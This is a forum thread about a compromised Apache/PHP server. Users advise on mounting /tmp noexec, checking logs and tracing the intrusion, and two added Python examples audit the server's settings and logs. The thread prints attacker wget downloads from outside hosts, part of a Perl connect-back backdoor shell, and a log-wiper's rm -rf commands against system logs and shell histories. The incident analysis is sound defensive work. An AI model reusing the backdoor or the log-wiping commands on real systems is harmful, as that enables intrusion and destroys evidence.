# I have been hacked

## marquischan

Some guys put a udp.pl on my server and keep it running continuously to make my network BUSY.

I don't know how he got in or how to prevent this again. What can I do?

----------

## asiobob

Where is the file located? Is it /tmp?

I'd probably rebuild the box.

What services are you running (as in, what programs are you running that open ports)?

----------

## marquischan

Yes, in the tmp directory. Would you rebuild the box if you were me?

How can he get in?

I only opened the ports for ssh, ftp, apache, subversion and pptp.

----------

## wynn

NeddySeagoon has suggested mounting /tmp noexec for just this reason.

----------

## asiobob

What "ftp" (what program and version)? Is it correctly configured in terms of security?

Also, the noexec option would have prevented the script from executing (but /tmp has to be on its own partition for that). However, it could be that the script is not being executed directly; rather, the attacker is actually running /usr/bin/perl with udp.pl as its input. In that case it's perl that is executing, and so the noexec does nothing.

You have to find out *how* they got in. You say Apache, but are there PHP / Perl / any other scripts in use, like a blog, forum, image gallery etc.? Then one of those programs could be compromised. Your FTP server might be configured incorrectly. You should look at every log file you can, for example the apache log and the ftp log; take what you read with a grain of salt, as the attacker could have modified them -- it depends on the level of compromise. We could make assumptions, but in security assumptions are bad.

----------

## marquischan

I am using Pure-FTPd, the latest version... ... !!!

----------

## marquischan

I just remembered that the perl file is under the user "apache".

----------

## Markus H

*marquischan wrote:*

> I just remembered that the perl file is under the user "apache".

The file was probably uploaded via the webserver, because of the file owner (apache).

If you have /tmp as its own partition you could secure it.

Edit your /etc/fstab and add noexec to the options. This will prevent users from executing files from the /tmp directory.

Run this to check for more files that can be executed from the /tmp directory (those files shouldn't be there):

```
find /tmp -exec file {} \; | egrep -i '(script|exec)'
```

If you find any, you should remove them.

If you are using PHP I would recommend using phpsuexec. It will make PHP run as CGI, and all files will be uploaded as the current user, not as the user the webserver is running under.

If it was uploaded via FTP it shouldn't say that the file owner is apache; it should say ftp or the login name for the FTP server.

----------

## marquischan

It seems that the file was uploaded by apache, and I am using PHP at the same time also.

However, is it related to subversion? Subversion also uses the user apache.

I know that PHP will handle the uploaded files in /tmp.

Is there any way to prevent it from changing / running / remoting?

The uploaded files should not be CHANGED / RUN using PHP and Apache ... ...

----------

## Fadoksi

Does "noexec" help in this case? Aren't they just executing perl, and just reading the script?

----------

## Markus H

It depends on how they executed the script.

I'm trying to execute a perl script under the /tmp directory. See what happens:

```
# ./perl.pl
./perl.pl: Permission denied.
```

And I'm logged on as root.

But this doesn't prevent you from running the script from outside the directory.

You can easily execute the script by doing this:

```
# perl /tmp/perl.pl
hello world
```

The code is executed.

This can also be executed from PHP with the function system();

To prevent it being executed from PHP you can turn on PHP's safe_mode or just turn off this function.

marquischan:

Do you have any other users on the server that have access to publish a website on your server?

If not, I don't think that was the security hole then.
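An added check (not from the thread) for the two mitigations discussed in this post and earlier: it reads /proc/mounts-style text to confirm /tmp is a separate mount carrying noexec (plus nosuid and nodev), and reads a php.ini fragment to report which process-spawning PHP functions (system() and its siblings) are still callable. The sample mount table and php.ini text are constructed; the same mount check can be pointed at /proc, as wynn suggests later in the thread.

```python
"""Audit two hardening points from the thread: is /tmp a separate mount with
noexec (plus nosuid/nodev), and does php.ini disable the process-spawning
functions that a compromised script would call. Added example, not from the
thread; the /proc/mounts and php.ini text below is constructed."""
import re

WANTED_TMP_OPTS = {"noexec", "nosuid", "nodev"}
# PHP functions that hand a string to a shell or spawn a process.
SHELL_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

def tmp_mount_opts(mounts_text, mountpoint="/tmp"):
    """Option set for mountpoint from /proc/mounts-style text, or None when it
    is not its own mount (then noexec cannot be applied to it at all)."""
    opts = None
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            opts = set(fields[3].split(","))   # last entry wins, as in the kernel
    return opts

def missing_tmp_opts(mounts_text):
    """Hardening options absent from /tmp, or None if /tmp is not a mount."""
    opts = tmp_mount_opts(mounts_text)
    return None if opts is None else WANTED_TMP_OPTS - opts

def php_disabled_functions(ini_text):
    """Names listed in php.ini's disable_functions directive (comments stripped)."""
    names = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            names |= {n.strip() for n in m.group(1).strip('"').split(",") if n.strip()}
    return names

def exposed_shell_funcs(ini_text):
    """Process-spawning PHP functions still callable under this php.ini."""
    return SHELL_FUNCS - php_disabled_functions(ini_text)

# Constructed samples: /tmp mounted without noexec, php.ini disabling only system().
SAMPLE_MOUNTS = """/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev 0 0
proc /proc proc rw 0 0
"""
SAMPLE_PHP_INI = """; constructed php.ini fragment
disable_functions = system
"""

if __name__ == "__main__":
    print("options missing on /tmp:", missing_tmp_opts(SAMPLE_MOUNTS))
    print("shell functions still enabled:", exposed_shell_funcs(SAMPLE_PHP_INI))
```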

----------

## marquischan

Everybody can go to the website and upload things to share... ... it is a public site... ...

Although some may need to log in, the situation is the same... ....

----------

## phorn

You may want to look in the logs for any related entries.

The apache log is in /usr/lib/apache2/logs/access_log

You should be able to look for entries around the ctime or mtime of the file in /tmp:

```
ls -l --time=ctime /tmp/udp.pl
```

I had my server hacked through a hole in awstats (by a bot). It managed to wipe every file/directory containing *log* (root-owned) and every file named *index* (for vandalism), so I'm not sure if some part of apache was running as root, or if it used a local kernel exploit to gain privileges.

Unless you lost your logs, you should be able to see what caused this to happen (you may be able to search for udp.pl to see if it was embedded into the GET string).

You may also want to secure your scripts a little better (maybe write down all services and web applications, CGI scripts, etc. you have running, and what people have access to each one).

Most likely this was a bot, so it was probably a public part of your site.

I would suspect it came in through an Apache-based script like PHP or perl. FTP can't run executables easily, so I do not think that is the cause. However, if you give users FTP access to a directory listed under a server root, or also in their home directory (~/public_html), then it is easy to run scripts like this from anywhere the user has access to (not just /tmp), so that's a possibility.

You can use

```
who /var/log/wtmp
```

to see the times your users have logged in, and look for a date before the script was placed in /tmp.

Anyway, this may be a good time to go through all your code and see where possible problems might be.

----------

## wynn

More security: there's a note at http://lwn.net/Articles/191510/ on the /proc vulnerability; mounting /proc nosuid,noexec is recommended.

More on /tmp: what are your recommendations on cleaning /tmp? Does it help security or is it just being tidy?

----------

## marquischan

I checked the log:

```
[Tue Jul 11 16:34:13 2006] [notice] Apache configured -- resuming normal operations
--08:57:47--  http://hyberner.net/dc.txt
           => `dc.txt.2'
Resolving hyberner.net... 142.217.199.251
Connecting to hyberner.net[142.217.199.251]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
08:57:52 ERROR 404: Not Found.
Unable to Connect
--12:51:32--  http://xpl.netmisphere2.com/r0nin
           => `r0nin'
Resolving xpl.netmisphere2.com... 82.237.120.143
Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,379 [application/x-executable]
    0K .......... .......... ...                             100% 24.6K
12:51:34 (24.59 KB/s) - `r0nin' saved [24,379/24,379]
--12:52:00--  http://paullemes.brtdata.com.br/bd.txt
           => `bd.txt'
Resolving paullemes.brtdata.com.br... 200.199.201.215
Connecting to paullemes.brtdata.com.br[200.199.201.215]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,688 [text/plain]
    0K .......... .                                          100% 14.7K
12:52:02 (14.69 KB/s) - `bd.txt' saved [11,688/11,688]
--12:56:53--  http://xpl.netmisphere2.com/dc.txt
           => `dc.txt.2'
Resolving xpl.netmisphere2.com... 82.237.120.143
Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,100 [text/plain]
    0K ..                                                    100%  256K
12:56:54 (249.12 KB/s) - `dc.txt.2' saved [2,100/2,100]
--12:59:01--  http://xpl.netmisphere2.com/dc.txt
           => `dc.txt.3'
Resolving xpl.netmisphere2.com... 82.237.120.143
Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,100 [text/plain]
    0K ..                                                    100%  205K
12:59:02 (193.82 KB/s) - `dc.txt.3' saved [2,100/2,100]
--12:59:56--  http://paullemes.brtdata.com.br/udp.pl
           => `udp.pl'
Resolving paullemes.brtdata.com.br... 200.199.201.215
Connecting to paullemes.brtdata.com.br[200.199.201.215]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,148 [text/plain]
    0K .                                                     100%
12:59:57 (19.91 MB/s) - `udp.pl' saved [1,148/1,148]
[Sun Jul 16 17:18:37 2006] [notice] Apache configured -- resuming normal operations
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--07:44:38--  http://dochell.altervista.org/httpd
           => `httpd'
Resolving dochell.altervista.org... 207.44.182.97
Connecting to dochell.altervista.org[207.44.182.97]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 [text/plain]
    0K .......... .......... .......... .......... ..........   47.09 KB/s 23%
   50K .......... .......... .......... .......... ..........  161.59 KB/s 46%
  100K .......... .......... .......... .......... ..........  232.08 KB/s 70%
  150K .......... .......... .......... .......... ..........  232.94 KB/s 93%
  200K .......... ....                                       100%  240K
07:44:42 (115.06 KB/s) - `httpd' saved [219,325/219,325]
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--07:45:12--  http://dochell.altervista.org/xh
           => `xh'
Resolving dochell.altervista.org... 207.44.182.97
Connecting to dochell.altervista.org[207.44.182.97]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,125 [text/plain]
    0K .......... ....                                       100% 27.6K
07:45:13 (27.58 KB/s) - `xh' saved [15,125/15,125]
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--07:45:29--  http://dochell.altervista.org/del
           => `del'
Resolving dochell.altervista.org... 207.44.182.97
Connecting to dochell.altervista.org[207.44.182.97]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,806 [text/plain]
    0K .......                                               100% 28.0K
07:45:29 (27.97 KB/s) - `del' saved [7,806/7,806]
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--07:45:44--  http://dochell.altervista.org/now
           => `now'
Resolving dochell.altervista.org... 207.44.182.97
Connecting to dochell.altervista.org[207.44.182.97]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,838 [text/plain]
    0K ....                                                  100% 18.2K
07:45:45 (18.19 KB/s) - `now' saved [4,838/4,838]
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--07:48:25--  http://dochell.altervista.org/httpd
           => `httpd'
Resolving dochell.altervista.org... 207.44.182.97
Connecting to dochell.altervista.org[207.44.182.97]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 [text/plain]
    0K .......... .......... .......... .......... ..........   47.09 KB/s 23%
   50K .......... .......... .......... .......... ..........  161.49 KB/s 46%
  100K .......... .......... .......... .......... ..........  233.12 KB/s 70%
  150K .......... .......... .......... .......... ..........  229.41 KB/s 93%
  200K .......... ....                                       100%  253K
07:48:27 (115.11 KB/s) - `httpd' saved [219,325/219,325]
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
```

----------

## phorn

It looks like your box has been owned, unless you have proper permissions.

You should definitely use your power as root and delete all those binaries, and kill all processes that don't look familiar...

Your log is interesting in that you should never see output from wget in your logs... that means that someone is injecting stuff into the scripts. If you use php or perl make sure to check ALL untrusted input -- it may pass a string into exec() or something of that sort.

Also, I don't think you are looking at the right log.

You should look at the access_log file (hopefully you had that enabled).

That should contain the complete HTTP query at the time, not just the output of the command (look for 12:56, as shown in the wget output, for example).  It would give you an indicator about what script was compromised.

If you use external scripts like awstats, make sure that they were up-to-date.

dc.txt is a backdoor program -- seems to call system('/bin/sh'):

```
print "--== ConnectBack Backdoor Shell vs 1.0"
if ($ARGC!=2) { 
   print "Usage: $0 [Host] [Port] \n\n"; 
   die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n"; 
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
system($system);
```

bd.txt is a perl file that allows others to remotely telnet to your box, probably under the apache account (I assume without a password):

```
#!/usr/bin/perl
# Telnet-like Standard Daemon 0.7
```

Here is the udp.pl file from that URL:

```
#!/usr/bin/perl
#####################################################
# udp flood.
```

From the contents, it seems not to do anything intelligently -- it just tries to waste bandwidth...

That httpd binary appears to be a program called iroffer (from strings).

The xh is a "process faker", from strings:

```
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002
Options:
-s string Fake name process
-d  Run aplication as daemon/system (optional)
-u uid[:gid] Change UID/GID, use another user (optional)
-p filename Save PID to filename (optional)
Example: %s -s "klogd -m 0" -d -p test.pid ./egg bot.conf
```

del is a program that deletes apache logs -- this may be responsible for the missing logs (again, they should not be writable by a user like apache, but who knows).

I'm pasting the whole strings output so you can look for those files that it references.

```
Erasing the logs... 
Fase 1: fast and easy log del
export HISTFILE=/dev/null
export HISTFILE=/dev/null - done
rm -rf /var/log/lastlog
|+| /var/log/lastlog - erased
rm -rf /var/log/wtmp
|+| /var/log/wtmp - erased
rm -rf /etc/wtmp
|+| /etc/wtmp - erased
rm -rf /var/run/utmp
|+| /var/run/utmp - erased
rm -rf /etc/utmp
|+| /etc/utmp - erased
rm -rf /var/log
|+| /var/log - erased
rm -rf /var/logs
|+| /var/logs - erased
rm -rf /var/adm
|+| /var/adm - erased
rm -rf /var/apache/log
|+| /var/apache/log - erased
rm -rf /var/apache/logs
|+| /var/apache/logs - erased
rm -rf /usr/local/apache/log
|+| /usr/local/apache/log - erased
rm -rf /usr/local/apache/logs
|+| /usr/local/apache/logs - erased
rm -rf /root/.bash_history
|+| /root/.bash_history - erased
rm -rf /root/.sh_history
|+| /root/.sh_history - erased
rm -rf /root/.ksh_history
|+| /root/.ksh_history - erased
rm -rf $HISTFILE
|+| $HISTFILE - erased
Fase 2: too long and del all log files
find / -name .bash_history -exec rm -rf {} \;
|+| all .bash_history - erased
find / -name .bash_logout -exec rm -rf {} \;
|+| all .bash_logout - erased
find / -name log* -exec rm -rf {} \;
|+| all log* - erased
find / -name *.log -exec rm -rf {} \;
|+| all *.log - erased
find / -name $HISTFILE -exec rm -rf {} \;
|+| all $HISTFILE - erased
|+| ------- Done, all log files are erased
```

Anyway, that should give you an idea of what those binaries have done or are doing to your system.  You may want to watch out if you see anything that requires root (writing into /tmp does not require root), because then the hackers are likely cracking your password hashes (and may have your password if they installed a keylogger).
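The triage step phorn describes above (take the times from the wget noise in the error_log, then look at access_log around those times and search the GET strings for udp.pl) as an added example, not code from the thread: it parses the wget "saved" lines in the format pasted earlier, pulls out Common Log Format requests within a window of each download, and flags any request whose URL-decoded request line mentions the downloaded file, its URL, or wget. The access_log lines are constructed; the two wget entries are copied from the log above.

```python
"""Correlate wget lines from the pasted error_log with access_log requests
near the same time of day, to find which script was abused. Added example,
not from the thread; access_log lines are constructed."""
import re
from datetime import datetime
from urllib.parse import unquote

WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"^(\d\d:\d\d:\d\d) \(.*?\) - `([^']+)' saved \[")
# Common Log Format: client, ident, user, [timestamp] "request line" ...
CLF = re.compile(r'^(\S+) \S+ \S+ \[(\d\d/\w{3}/\d{4}:(\d\d:\d\d:\d\d)) [^\]]*\] "([^"]*)"')

def wget_downloads(error_log):
    """Return (time_of_day, url, saved_name) for each completed wget download."""
    found, last_url = [], None
    for line in error_log.splitlines():
        m = WGET_START.match(line)
        if m:
            last_url = m.group(2)          # remembered until the matching 'saved'
            continue
        m = WGET_SAVED.match(line)
        if m:
            found.append((m.group(1), last_url, m.group(2)))
    return found

def seconds_apart(a, b):
    fmt = "%H:%M:%S"                       # the wget lines carry no date
    return abs((datetime.strptime(a, fmt) - datetime.strptime(b, fmt)).total_seconds())

def correlate(error_log, access_log, window_s=120):
    """For each download, list requests within window_s of its time of day and
    flag any whose URL-decoded request line names the file, its URL, or wget."""
    requests = [m.groups() for m in map(CLF.match, access_log.splitlines()) if m]
    report = []
    for when, url, name in wget_downloads(error_log):
        markers = [x.lower() for x in (name, url, "wget") if x]
        near = []
        for client, stamp, tod, req in requests:
            if seconds_apart(tod, when) <= window_s:
                flagged = any(k in unquote(req).lower() for k in markers)
                near.append((client, stamp, req, flagged))
        report.append({"time": when, "url": url, "file": name, "requests": near})
    return report

# Constructed sample input; the wget entries mirror the thread's log format.
ERROR_LOG = """--12:51:32--  http://xpl.netmisphere2.com/r0nin
           => `r0nin'
12:51:34 (24.59 KB/s) - `r0nin' saved [24,379/24,379]
--12:59:56--  http://paullemes.brtdata.com.br/udp.pl
           => `udp.pl'
12:59:57 (19.91 MB/s) - `udp.pl' saved [1,148/1,148]
"""
ACCESS_LOG = """203.0.113.5 - - [16/Jul/2006:12:59:55 +0000] "GET /cgi-bin/stats.pl?q=udp.pl HTTP/1.0" 200 512
198.51.100.7 - - [16/Jul/2006:12:59:58 +0000] "GET /index.php HTTP/1.1" 200 2048
198.51.100.9 - - [16/Jul/2006:09:15:02 +0000] "GET /gallery/ HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for entry in correlate(ERROR_LOG, ACCESS_LOG):
        print(entry["time"], entry["file"], [(c, r, f) for c, _, r, f in entry["requests"]])
```

Flagged requests are only candidates: a script can be abused without the payload ever naming the downloaded file, so every request in the window deserves a look, and a log wiped by something like the del tool above yields nothing at all.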

----------

